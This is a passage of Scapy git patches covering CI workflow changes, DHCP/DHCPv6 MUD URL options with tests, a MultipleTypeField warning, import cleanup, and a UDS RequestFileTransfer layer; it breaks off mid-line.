Sequence[AnyField] ): # type: (...) -> None """ @@ -284,7 +285,7 @@ def do_init_cached_fields(self): self.fields[fname] = value[:] def prepare_cached_fields(self, flist): - # type: (List[AnyField]) -> None + # type: (Sequence[AnyField]) -> None """ Prepare the cached fields of the fields_desc dict """ From 6106662c3fd56a952ff2f6d96662419952d88c3d Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Thu, 26 Nov 2020 15:39:17 +0100 Subject: [PATCH 0414/1632] GHCI: OSX & merge CodeQL --- .config/ci/test.sh | 4 +- .github/workflows/codeql-analysis.yml | 62 --------------------------- .github/workflows/unittests.yml | 44 +++++++++++++++++-- .travis.yml | 22 +--------- 4 files changed, 44 insertions(+), 88 deletions(-) delete mode 100644 .github/workflows/codeql-analysis.yml diff --git a/.config/ci/test.sh b/.config/ci/test.sh index edcd0531752..ec38dc0a0e3 100755 --- a/.config/ci/test.sh +++ b/.config/ci/test.sh @@ -23,9 +23,9 @@ then else UT_FLAGS+=" -K vcan_socket" fi -elif [ "$OSTYPE" = "darwin"* ] || [ "$TRAVIS_OS_NAME" = "osx" ] +elif [[ "$OSTYPE" = "darwin"* ]] || [ "$TRAVIS_OS_NAME" = "osx" ] then - OSTOX="osx" + OSTOX="bsd" # Travis CI in macOS 10.13+ can't load kexts. Need this for tuntaposx. UT_FLAGS+=" -K tun -K tap" fi diff --git a/.github/workflows/codeql-analysis.yml b/.github/workflows/codeql-analysis.yml deleted file mode 100644 index e74db5df1d7..00000000000 --- a/.github/workflows/codeql-analysis.yml +++ /dev/null @@ -1,62 +0,0 @@ -name: "CodeQL" - -on: - push: - branches: [master] - pull_request: - # The branches below must be a subset of the branches above - branches: [master] - schedule: - - cron: '0 0 * * 1' - -jobs: - analyze: - name: Analyze - runs-on: ubuntu-latest - - strategy: - fail-fast: false - matrix: - # Override automatic language detection by changing the below list - # Supported options are ['csharp', 'cpp', 'go', 'java', 'javascript', 'python'] - language: ['python'] - # Learn more... - # https://docs.github.com/en/github/finding-security-vulnerabilities-and-errors-in-your-code/configuring-code-scanning#overriding-automatic-language-detection - - steps: - - name: Checkout repository - uses: actions/checkout@v2 - with: - # We must fetch at least the immediate parents so that if this is - # a pull request then we can checkout the head. - fetch-depth: 2 - - # If this run was triggered by a pull request event, then checkout - # the head of the pull request instead of the merge commit. - - run: git checkout HEAD^2 - if: ${{ github.event_name == 'pull_request' }} - - # Initializes the CodeQL tools for scanning. - - name: Initialize CodeQL - uses: github/codeql-action/init@v1 - with: - languages: ${{ matrix.language }} - - # Autobuild attempts to build any compiled languages (C/C++, C#, or Java). - # If this step fails, then you should remove it and run the build manually (see below) - - name: Autobuild - uses: github/codeql-action/autobuild@v1 - - # ℹ️ Command-line programs to run using the OS shell. - # 📚 https://git.io/JvXDl - - # ✏️ If the Autobuild fails above, remove it and uncomment the following three lines - # and modify them (or add more) to build your code if your project - # uses a compiled language - - #- run: | - # make bootstrap - # make release - - - name: Perform CodeQL Analysis - uses: github/codeql-action/analyze@v1 diff --git a/.github/workflows/unittests.yml b/.github/workflows/unittests.yml index 5336c627fdd..cb2773c8dc4 100644 --- a/.github/workflows/unittests.yml +++ b/.github/workflows/unittests.yml @@ -1,6 +1,11 @@ name: Scapy unit tests -on: [push, pull_request] +on: + push: + branches: [master] + pull_request: + # The branches below must be a subset of the branches above + branches: [master] jobs: health: @@ -52,11 +57,20 @@ jobs: # Github Actions block ICMP. We can still use it for non root tests utscapy: - name: Non-sudo unit tests - runs-on: ubuntu-latest + name: ${{ matrix.os }} ${{ matrix.python }} ${{ matrix.mode }} + runs-on: ${{ matrix.os }} strategy: matrix: + os: [ubuntu-latest] python: [2.7, pypy2, pypy3, 3.5, 3.6, 3.7, 3.8, 3.9] + mode: [non_root] + include: + - os: macos-latest + python: 2.7 + mode: both + - os: macos-latest + python: 3.9 + mode: both steps: - name: Checkout Scapy uses: actions/checkout@v2 @@ -67,8 +81,30 @@ jobs: - name: Install Tox and any other packages run: ./.config/ci/install.sh - name: Run Tox - run: ./.config/ci/test.sh ${{ matrix.python }} non_root + run: ./.config/ci/test.sh ${{ matrix.python }} ${{ matrix.mode }} - name: Codecov uses: codecov/codecov-action@v1 with: file: /home/runner/work/scapy/scapy/.coverage + + # CODE-QL + analyze: + name: CodeQL analysis + runs-on: ubuntu-latest + strategy: + fail-fast: false + matrix: + language: ['python'] + steps: + - name: Checkout repository + uses: actions/checkout@v2 + with: + fetch-depth: 2 + - run: git checkout HEAD^2 + if: ${{ github.event_name == 'pull_request' }} + - name: Initialize CodeQL + uses: github/codeql-action/init@v1 + with: + languages: ${{ matrix.language }} + - name: Perform CodeQL Analysis + uses: github/codeql-action/analyze@v1 diff --git a/.travis.yml b/.travis.yml index 52c0ef4b9f6..2435670f9a7 100644 --- a/.travis.yml +++ b/.travis.yml @@ -7,7 +7,8 @@ cache: jobs: include: - # Run linux as root (non root tested by github ci) + # Run linux as root on linux. + # Non-root on linux and root/non_root on OSX are tested via GitHub CI - os: linux python: 2.7 env: @@ -28,25 +29,6 @@ jobs: env: - TOXENV=py38-linux_root,codecov - # run OSX - - os: osx - osx_image: xcode9.3 - language: shell - before_install: - - python --version - - pip install --upgrade --ignore-installed --user pip tox setuptools - env: - - TOXENV=py27-bsd_non_root,py27-bsd_root,codecov - - - os: osx - osx_image: xcode10.2 - language: shell - before_install: - - python3 --version - - pip3 install --upgrade --ignore-installed pip tox setuptools - env: - - TOXENV=py37-bsd_non_root,py37-bsd_root,codecov - # run custom root tests # isotp - os: linux From 5375307892473341914f50efccc26ae0bc0c791a Mon Sep 17 00:00:00 2001 From: kylma Date: Fri, 27 Nov 2020 17:27:15 +0100 Subject: [PATCH 0415/1632] Fix typo in the documentation of SOME/IP SD (#2982) --- doc/scapy/layers/automotive.rst | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/doc/scapy/layers/automotive.rst b/doc/scapy/layers/automotive.rst index 2b9142d9a63..5329579d0f2 100644 --- a/doc/scapy/layers/automotive.rst +++ b/doc/scapy/layers/automotive.rst @@ -963,7 +963,7 @@ Create the entry array input:: Create the options array input:: - oa = SDOption_IP4_Endpoint() + oa = SDOption_IP4_EndPoint() oa.addr = "192.168.0.13" oa.l4_proto = 0x11 oa.port = 30509 From a32abf39fd70293210d9a00a24c2cb87d255c8b0 Mon Sep 17 00:00:00 2001 From: Jan Romann Date: Wed, 18 Nov 2020 19:44:09 +0100 Subject: [PATCH 0416/1632] Add MUD URL option to DHCPv6 layer --- scapy/layers/dhcp6.py | 15 ++++++++++++++- 1 file changed, 14 insertions(+), 1 deletion(-) diff --git a/scapy/layers/dhcp6.py b/scapy/layers/dhcp6.py index ee5bff1f0ae..8d5c48c6756 100644 --- a/scapy/layers/dhcp6.py +++ b/scapy/layers/dhcp6.py @@ -126,7 +126,9 @@ def _dhcp6_dispatcher(x, *args, **kargs): 65: "OPTION_ERP_LOCAL_DOMAIN_NAME", # RFC6440 66: "OPTION_RELAY_SUPPLIED_OPTIONS", # RFC6422 68: "OPTION_VSS", # RFC6607 - 79: "OPTION_CLIENT_LINKLAYER_ADDR"} # RFC6939 + 79: "OPTION_CLIENT_LINKLAYER_ADDR", # RFC6939 + 112: "OPTION_MUD_URL", # RFC8520 + } dhcp6opts_by_code = {1: "DHCP6OptClientId", 2: "DHCP6OptServerId", @@ -182,6 +184,7 @@ def _dhcp6_dispatcher(x, *args, **kargs): 66: "DHCP6OptRelaySuppliedOpt", # RFC6422 68: "DHCP6OptVSS", # RFC6607 79: "DHCP6OptClientLinkLayerAddr", # RFC6939 + 112: "DHCP6OptMudUrl", # RFC8520 } @@ -1026,6 +1029,16 @@ class DHCP6OptClientLinkLayerAddr(_DHCP6OptGuessPayload): # RFC6939 _LLAddrField("clladdr", ETHER_ANY)] +class DHCP6OptMudUrl(_DHCP6OptGuessPayload): # RFC8520 + name = "DHCP6 Option - MUD URL" + fields_desc = [ShortEnumField("optcode", 112, dhcp6opts), + FieldLenField("optlen", None, length_of="mudString"), + StrLenField("mudString", "", + length_from=lambda pkt: pkt.optlen, + max_length=253, + )] + + ##################################################################### # DHCPv6 messages # ##################################################################### From 215164a0febb9efa8840c9ca4e25284d49b83125 Mon Sep 17 00:00:00 2001 From: Jan Romann Date: Wed, 18 Nov 2020 20:12:53 +0100 Subject: [PATCH 0417/1632] Add MUD URL option to DHCPv4 layer --- scapy/layers/dhcp.py | 1 + 1 file changed, 1 insertion(+) diff --git a/scapy/layers/dhcp.py b/scapy/layers/dhcp.py index f035b067294..52053908443 100644 --- a/scapy/layers/dhcp.py +++ b/scapy/layers/dhcp.py @@ -220,6 +220,7 @@ def getfield(self, pkt, s): 150: IPField("tftp_server_address", "0.0.0.0"), 159: "v4-portparams", 160: StrField("v4-captive-portal", ""), + 161: StrField("mud-url", ""), 208: "pxelinux_magic", 209: "pxelinux_configuration_file", 210: "pxelinux_path_prefix", From 23238d9fb7a316ae84bfe9ee343cf35805cb62dd Mon Sep 17 00:00:00 2001 From: Jan Romann Date: Fri, 20 Nov 2020 02:46:12 +0100 Subject: [PATCH 0418/1632] Add test case for MUD URL option in DHCPv4 layer --- test/scapy/layers/dhcp.uts | 7 +++++++ 1 file changed, 7 insertions(+) diff --git a/test/scapy/layers/dhcp.uts b/test/scapy/layers/dhcp.uts index f7cafd75ccc..19c77b88350 100644 --- a/test/scapy/layers/dhcp.uts +++ b/test/scapy/layers/dhcp.uts @@ -42,6 +42,9 @@ s3 = raw(IP(src="127.0.0.1")/UDP()/BOOTP(chaddr="05:04:03:02:01:00")/DHCP(option ("ieee802-3-encapsulation", 2),("max_dgram_reass_size", 120), ("pxelinux_path_prefix","/some/path"), "end"])) assert s3 == b'E\x00\x01=\x00\x01\x00\x00@\x11{\xad\x7f\x00\x00\x01\x7f\x00\x00\x01\x00C\x00D\x01)\x04i\x01\x01\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0005:04:03:02:01:0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00c\x82Sc\x02\x04\x00\x00\x00{b\x0fwww.example.comp\x04\n\x00\x00\x01$\x01\x02\x16\x02\x00x\xd2\n/some/path\xff' +s4 = raw(IP(src="127.0.0.1")/UDP()/BOOTP(chaddr="00:01:02:03:04:05")/DHCP(options=[("mud-url", "https://example.org"), "end"])) +assert s4 == b'E\x00\x01"\x00\x01\x00\x00@\x11{\xc8\x7f\x00\x00\x01\x7f\x00\x00\x01\x00C\x00D\x01\x0e\tr\x01\x01\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0000:01:02:03:04:0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00c\x82Sc\xa1\x13https://example.org\xff' + = DHCP - dissection p = IP(s) @@ -62,6 +65,10 @@ assert p3[DHCP].options[4] == ("max_dgram_reass_size", 120) assert p3[DHCP].options[5] == ("pxelinux_path_prefix", b'/some/path') assert p3[DHCP].options[6] == "end" +p4 = IP(s4) +assert DHCP in p4 +assert p4[DHCP].options[0] == ("mud-url", "https://example.org") + = DHCPOptions # Issue #2786 From c47e4124b9272ce3d66d14b2070f8de866143e57 Mon Sep 17 00:00:00 2001 From: Jan Romann Date: Fri, 20 Nov 2020 02:46:50 +0100 Subject: [PATCH 0419/1632] Add test cases for MUD URL option in DHCPv6 layer --- test/scapy/layers/dhcp.uts | 2 +- test/scapy/layers/dhcp6.uts | 17 +++++++++++++++++ 2 files changed, 18 insertions(+), 1 deletion(-) diff --git a/test/scapy/layers/dhcp.uts b/test/scapy/layers/dhcp.uts index 19c77b88350..d196885074d 100644 --- a/test/scapy/layers/dhcp.uts +++ b/test/scapy/layers/dhcp.uts @@ -67,7 +67,7 @@ assert p3[DHCP].options[6] == "end" p4 = IP(s4) assert DHCP in p4 -assert p4[DHCP].options[0] == ("mud-url", "https://example.org") +assert p4[DHCP].options[0] == ("mud-url", b"https://example.org") = DHCPOptions diff --git a/test/scapy/layers/dhcp6.uts b/test/scapy/layers/dhcp6.uts index 4558cd227fb..7681a60044a 100644 --- a/test/scapy/layers/dhcp6.uts +++ b/test/scapy/layers/dhcp6.uts @@ -1184,6 +1184,23 @@ p = DHCP6OptClientLinkLayerAddr(r) assert(p.clladdr == "00:01:02:03:04:05") +############ +############ ++ Test DHCP6 Option MUD URL + += Basic build & dissect +s = raw(DHCP6OptMudUrl()) +assert(s == b"\x00p\x00\x00") + +p = DHCP6OptMudUrl(s) +assert(p.mudString == b"") + +r = b'\x00p\x00\x13https://example.org' +p = DHCP6OptMudUrl(r) +assert(p.mudString == b"https://example.org") +assert(p.optlen == 19) + + ############ ############ + Test DHCP6 Option Virtual Subnet Selection From ce8e29ba0652bce0f5655e5fe87eed9c8e2ccd50 Mon Sep 17 00:00:00 2001 From: Jan Romann Date: Fri, 27 Nov 2020 09:16:30 +0100 Subject: [PATCH 0420/1632] fixup! Add test cases for MUD URL option in DHCPv6 layer --- test/scapy/layers/dhcp6.uts | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/test/scapy/layers/dhcp6.uts b/test/scapy/layers/dhcp6.uts index 7681a60044a..6b0b90fcfa7 100644 --- a/test/scapy/layers/dhcp6.uts +++ b/test/scapy/layers/dhcp6.uts @@ -1193,11 +1193,11 @@ s = raw(DHCP6OptMudUrl()) assert(s == b"\x00p\x00\x00") p = DHCP6OptMudUrl(s) -assert(p.mudString == b"") +assert(p.mudstring == b"") r = b'\x00p\x00\x13https://example.org' p = DHCP6OptMudUrl(r) -assert(p.mudString == b"https://example.org") +assert(p.mudstring == b"https://example.org") assert(p.optlen == 19) From 47c999dec0d12a10ce07deebcadd9ade8ab83fd7 Mon Sep 17 00:00:00 2001 From: Jan Romann Date: Fri, 27 Nov 2020 09:17:03 +0100 Subject: [PATCH 0421/1632] fixup! Add MUD URL option to DHCPv6 layer --- scapy/layers/dhcp6.py | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/scapy/layers/dhcp6.py b/scapy/layers/dhcp6.py index 8d5c48c6756..19a40fab939 100644 --- a/scapy/layers/dhcp6.py +++ b/scapy/layers/dhcp6.py @@ -1032,8 +1032,8 @@ class DHCP6OptClientLinkLayerAddr(_DHCP6OptGuessPayload): # RFC6939 class DHCP6OptMudUrl(_DHCP6OptGuessPayload): # RFC8520 name = "DHCP6 Option - MUD URL" fields_desc = [ShortEnumField("optcode", 112, dhcp6opts), - FieldLenField("optlen", None, length_of="mudString"), - StrLenField("mudString", "", + FieldLenField("optlen", None, length_of="mudstring"), + StrLenField("mudstring", "", length_from=lambda pkt: pkt.optlen, max_length=253, )] From 7fe90181a705410d49b21ed5bb2c1194c16e5d59 Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Wed, 18 Nov 2020 18:26:50 +0100 Subject: [PATCH 0422/1632] MultipleTypeField: warn on wrong usage --- scapy/fields.py | 5 +++++ test/fields.uts | 16 ++++++++++++++++ 2 files changed, 21 insertions(+) diff --git a/scapy/fields.py b/scapy/fields.py index 734c1177a94..23edf8e6569 100644 --- a/scapy/fields.py +++ b/scapy/fields.py @@ -412,6 +412,11 @@ def __init__(self, self.dflt = dflt self.default = None # So that we can detect changes in defaults self.name = self.dflt.name + if any(x[0].name != self.name for x in self.flds): + warnings.warn( + "All fields should have the same name in a MultipleTypeField", + SyntaxWarning + ) def _iterate_fields_cond(self, pkt, val, use_val): # type: (Optional[Packet], Any, bool) -> Field[Any, Any] diff --git a/test/fields.uts b/test/fields.uts index e1f44a7b07d..16830c051ba 100644 --- a/test/fields.uts +++ b/test/fields.uts @@ -1401,6 +1401,22 @@ assert o.subfield == 0xBEEFBEEF o = SweetPacket(switch=1, subfield=0x88) assert o.subfield == 0x88 += MultipleTypeField - syntax error + +import warnings + +with warnings.catch_warnings(record=True) as w: + warnings.simplefilter("always") + class MTFPacket(Packet): + fields_desc = [ByteField("a", 0), + MultipleTypeField([ + (ByteField("b", 0), lambda pkt: pkt.a == 0), + (ShortField("not_b", 0), lambda: pkt.a != 0), + ], IntField("b", 0))] + assert len(w) == 1 + assert issubclass(w[-1].category, SyntaxWarning) + + ######## ######## + FlagsField From 2c3b37a7f3ede7fae890591cc68b9016f6255958 Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Thu, 3 Dec 2020 23:24:20 +0100 Subject: [PATCH 0423/1632] Fix sendsniff.uts indentation (#2996) --- test/sendsniff.uts | 32 ++++++++++++++------------------ 1 file changed, 14 insertions(+), 18 deletions(-) diff --git a/test/sendsniff.uts b/test/sendsniff.uts index 07eed036973..ea444b26414 100644 --- a/test/sendsniff.uts +++ b/test/sendsniff.uts @@ -28,8 +28,7 @@ t_sniff = Thread( target=sniff, kwargs={"iface": "tap1", "count": 5, "prn": Packet.summary, "lfilter": lambda p: IP in p and p[IP].src == "192.0.2.1"}, - name="tests sniff 1" -) + name="tests sniff 1") t_sniff.start() = Run a bridge_and_sniff thread between the taps **sockets** @@ -57,8 +56,7 @@ t_sniff = Thread( target=sniff, kwargs={"iface": "tap1", "count": 5, "prn": Packet.summary, "lfilter": lambda p: IP in p and p[IP].src == "198.51.100.1"}, - name="tests sniff 2" -) + name="tests sniff 2") t_sniff.start() = Run a bridge_and_sniff thread between the taps **sockets** @@ -127,12 +125,12 @@ time.sleep(10) = Run a sniff thread on the tun1 **interface** * It will terminate when 5 IP packets from 192.0.2.1 have been sniffed -t_sniff = Thread( - target=sniff, - kwargs={"iface": "tun1", "count": 5, "prn": Packet.summary, - "lfilter": lambda p: IP in p and p[IP].src == "192.0.2.1"}, - name="tests sniff 3") -) +t_sniff = Thread(target=sniff, + kwargs={"iface": "tun1", "count": 5, + "prn": Packet.summary, + "lfilter": lambda p: IP in p and p[IP].src == "192.0.2.1"}, + name="tests sniff 3") + t_sniff.start() = Run a bridge_and_sniff thread between the tuns **sockets** @@ -158,12 +156,11 @@ assert not t_sniff.is_alive() = Run a sniff thread on the tun1 **interface** * It will terminate when 5 IP packets from 198.51.100.1 have been sniffed -t_sniff = Thread( - target=sniff, - kwargs={"iface": "tun1", "count": 5, "prn": Packet.summary, - "lfilter": lambda p: IP in p and p[IP].src == "198.51.100.1"}, - name="tests sniff 4") -) +t_sniff = Thread(target=sniff, + kwargs={"iface": "tun1", "count": 5, "prn": Packet.summary, + "lfilter": lambda p: IP in p and p[IP].src == "198.51.100.1"}, + name="tests sniff 4") + t_sniff.start() = Run a bridge_and_sniff thread between the tuns **sockets** @@ -301,8 +298,7 @@ t_answer = Thread( target=sniff, kwargs={"prn": answer_arp_leak, "timeout": 10, "store": False, "opened_socket": tap0}, - name="tests answer_arp_leak" -) + name="tests answer_arp_leak") t_answer.start() From b392b7b4663f8520986de319055067a4169fdbaa Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Fri, 4 Dec 2020 00:15:43 +0100 Subject: [PATCH 0424/1632] Unify six imports in multiple contrib layers (#2995) --- scapy/contrib/automotive/enumerator.py | 2 +- scapy/contrib/eddystone.py | 2 +- scapy/contrib/ethercat.py | 2 +- scapy/contrib/isotp.py | 2 +- scapy/contrib/openflow.py | 2 +- scapy/contrib/openflow3.py | 2 +- scapy/contrib/pnio.py | 2 +- 7 files changed, 7 insertions(+), 7 deletions(-) diff --git a/scapy/contrib/automotive/enumerator.py b/scapy/contrib/automotive/enumerator.py index 226c17c259e..14a9382fa79 100644 --- a/scapy/contrib/automotive/enumerator.py +++ b/scapy/contrib/automotive/enumerator.py @@ -10,7 +10,7 @@ from scapy.error import Scapy_Exception, log_interactive, warning from scapy.utils import make_lined_table, SingleConversationSocket -from scapy.modules import six +import scapy.modules.six as six from scapy.contrib.automotive.ecu import ECU_State diff --git a/scapy/contrib/eddystone.py b/scapy/contrib/eddystone.py index 62406697e23..33e209c0b0c 100644 --- a/scapy/contrib/eddystone.py +++ b/scapy/contrib/eddystone.py @@ -27,7 +27,7 @@ StrFixedLenField, ShortField, FixedPointField, ByteEnumField from scapy.layers.bluetooth import EIR_Hdr, EIR_ServiceData16BitUUID, \ EIR_CompleteList16BitServiceUUIDs, LowEnergyBeaconHelper -from scapy.modules import six +import scapy.modules.six as six from scapy.packet import bind_layers, Packet EDDYSTONE_UUID = 0xfeaa diff --git a/scapy/contrib/ethercat.py b/scapy/contrib/ethercat.py index 43aa84eb909..77196e866c8 100644 --- a/scapy/contrib/ethercat.py +++ b/scapy/contrib/ethercat.py @@ -51,7 +51,7 @@ from scapy.fields import BitField, ByteField, LEShortField, FieldListField, \ LEIntField, FieldLenField, _EnumField, EnumField from scapy.layers.l2 import Ether, Dot1Q -from scapy.modules import six +import scapy.modules.six as six from scapy.packet import bind_layers, Packet, Padding ''' diff --git a/scapy/contrib/isotp.py b/scapy/contrib/isotp.py index d1098570da1..a57b3a70728 100644 --- a/scapy/contrib/isotp.py +++ b/scapy/contrib/isotp.py @@ -31,7 +31,7 @@ from scapy.layers.can import CAN import scapy.modules.six as six import scapy.automaton as automaton -import six.moves.queue as queue +from scapy.modules.six.moves import queue from scapy.error import Scapy_Exception, warning, log_loading, log_runtime from scapy.supersocket import SuperSocket, SO_TIMESTAMPNS from scapy.config import conf diff --git a/scapy/contrib/openflow.py b/scapy/contrib/openflow.py index 15409185732..3eafcbdd3bd 100755 --- a/scapy/contrib/openflow.py +++ b/scapy/contrib/openflow.py @@ -23,7 +23,7 @@ from scapy.layers.inet import TCP from scapy.packet import Packet, Raw, bind_bottom_up, bind_top_down from scapy.utils import binrepr -from scapy.modules import six +import scapy.modules.six as six # If prereq_autocomplete is True then match prerequisites will be diff --git a/scapy/contrib/openflow3.py b/scapy/contrib/openflow3.py index b3b452318c2..a5582ab53df 100755 --- a/scapy/contrib/openflow3.py +++ b/scapy/contrib/openflow3.py @@ -25,7 +25,7 @@ XIntField, XShortField, PacketLenField from scapy.layers.l2 import Ether from scapy.packet import Packet, Padding, Raw -from scapy.modules import six +import scapy.modules.six as six from scapy.contrib.openflow import _ofp_header, _ofp_header_item, \ OFPacketField, OpenFlow, _UnknownOpenFlow diff --git a/scapy/contrib/pnio.py b/scapy/contrib/pnio.py index 72afcd6e4ba..373cbd7fded 100644 --- a/scapy/contrib/pnio.py +++ b/scapy/contrib/pnio.py @@ -30,7 +30,7 @@ StrFixedLenField, ShortField, FlagsField, ByteField, XIntField, X3BytesField ) -from scapy.modules import six +import scapy.modules.six as six PNIO_FRAME_IDS = { 0x0020: "PTCP-RTSyncPDU-followup", From ea947944d960fd4348404a6ff49eed5139f11df6 Mon Sep 17 00:00:00 2001 From: Andreas Korb Date: Thu, 19 Nov 2020 19:52:06 +0100 Subject: [PATCH 0425/1632] Add service RequestFileTransfer to UDS implementation --- scapy/contrib/automotive/uds.py | 100 +++++++++++++++++++++++++++++++- test/contrib/automotive/uds.uts | 29 +++++++-- 2 files changed, 124 insertions(+), 5 deletions(-) diff --git a/scapy/contrib/automotive/uds.py b/scapy/contrib/automotive/uds.py index 09e14ac71de..013e6aa05c1 100644 --- a/scapy/contrib/automotive/uds.py +++ b/scapy/contrib/automotive/uds.py @@ -11,7 +11,8 @@ from scapy.fields import ByteEnumField, StrField, ConditionalField, \ BitEnumField, BitField, XByteField, FieldListField, \ XShortField, X3BytesField, XIntField, ByteField, \ - ShortField, ObservableDict, XShortEnumField, XByteEnumField + ShortField, ObservableDict, XShortEnumField, XByteEnumField, StrLenField, \ + FieldLenField from scapy.packet import Packet, bind_layers, NoPayload from scapy.config import conf from scapy.error import log_loading @@ -54,6 +55,7 @@ class UDS(ISOTP): 0x35: 'RequestUpload', 0x36: 'TransferData', 0x37: 'RequestTransferExit', + 0x38: 'RequestFileTransfer', 0x3D: 'WriteMemoryByAddress', 0x3E: 'TesterPresent', 0x50: 'DiagnosticSessionControlPositiveResponse', @@ -74,6 +76,7 @@ class UDS(ISOTP): 0x75: 'RequestUploadPositiveResponse', 0x76: 'TransferDataPositiveResponse', 0x77: 'RequestTransferExitPositiveResponse', + 0x78: 'RequestFileTransferPositiveResponse', 0x7D: 'WriteMemoryByAddressPositiveResponse', 0x7E: 'TesterPresentPositiveResponse', 0x83: 'AccessTimingParameter', @@ -1221,6 +1224,101 @@ def get_log(pkt): bind_layers(UDS, UDS_RTEPR, service=0x77) +# #########################RFT################################### +class UDS_RFT(Packet): + name = 'RequestFileTransfer' + + modeOfOperations = { + 0x00: "ISO/SAE Reserved", + 0x01: "Add File", + 0x02: "Delete File", + 0x03: "Replace File", + 0x04: "Read File", + 0x05: "Read Directory" + } + + @staticmethod + def _contains_file_size(packet): + return packet.modeOfOperation not in [2, 4, 5] + + fields_desc = [ + XByteEnumField('modeOfOperation', 0, modeOfOperations), + FieldLenField('filePathAndNameLength', 0, + length_of='filePathAndName', fmt='H'), + StrLenField('filePathAndName', b"", + length_from=lambda p: p.filePathAndNameLength), + ConditionalField(BitField('compressionMethod', 0, 4), + lambda p: p.modeOfOperation not in [2, 5]), + ConditionalField(BitField('encryptingMethod', 0, 4), + lambda p: p.modeOfOperation not in [2, 5]), + ConditionalField(FieldLenField('fileSizeParameterLength', 0, fmt="B", + length_of='fileSizeUnCompressed'), + lambda p: UDS_RFT._contains_file_size(p)), + ConditionalField(StrLenField('fileSizeUnCompressed', b"", + length_from=lambda p: + p.fileSizeParameterLength), + lambda p: UDS_RFT._contains_file_size(p)), + ConditionalField(StrLenField('fileSizeCompressed', b"", + length_from=lambda p: + p.fileSizeParameterLength), + lambda p: UDS_RFT._contains_file_size(p)) + ] + + @staticmethod + def get_log(pkt): + return pkt.sprintf("%UDS.service%"),\ + pkt.modeOfOperation + + +bind_layers(UDS, UDS_RFT, service=0x38) + + +class UDS_RFTPR(Packet): + name = 'RequestFileTransferPositiveResponse' + + @staticmethod + def _contains_data_format_identifier(packet): + return packet.modeOfOperation != 0x02 + + fields_desc = [ + XByteEnumField('modeOfOperation', 0, UDS_RFT.modeOfOperations), + ConditionalField(FieldLenField('lengthFormatIdentifier', 0, + length_of='maxNumberOfBlockLength', + fmt='B'), + lambda p: p.modeOfOperation != 2), + ConditionalField(StrLenField('maxNumberOfBlockLength', b"", + length_from=lambda p: p.lengthFormatIdentifier), + lambda p: p.modeOfOperation != 2), + ConditionalField(BitField('compressionMethod', 0, 4), + lambda p: p.modeOfOperation != 0x02), + ConditionalField(BitField('encryptingMethod', 0, 4), + lambda p: p.modeOfOperation != 0x02), + ConditionalField(FieldLenField('fileSizeOrDirInfoParameterLength', 0, + length_of='fileSizeUncompressedOrDirInfoLength'), + lambda p: p.modeOfOperation not in [1, 2, 3]), + ConditionalField(StrLenField('fileSizeUncompressedOrDirInfoLength', + b"", + length_from=lambda p: + p.fileSizeOrDirInfoParameterLength), + lambda p: p.modeOfOperation not in [1, 2, 3]), + ConditionalField(StrLenField('fileSizeCompressed', b"", + length_from=lambda p: + p.fileSizeOrDirInfoParameterLength), + lambda p: p.modeOfOperation not in [1, 2, 3, 5]), + ] + + def answers(self, other): + return other.__class__ == UDS_RFT + + @staticmethod + def get_log(pkt): + return pkt.sprintf("%UDS.service%"),\ + pkt.modeOfOperation + + +bind_layers(UDS, UDS_RFTPR, service=0x78) + + # #########################IOCBI################################### class UDS_IOCBI(Packet): name = 'InputOutputControlByIdentifier' diff --git a/test/contrib/automotive/uds.uts b/test/contrib/automotive/uds.uts index cae39d2ea8f..a19d625baf4 100644 --- a/test/contrib/automotive/uds.uts +++ b/test/contrib/automotive/uds.uts @@ -970,13 +970,34 @@ assert iocbi.dataIdentifier == 0x2334 assert iocbi.controlOptionRecord == 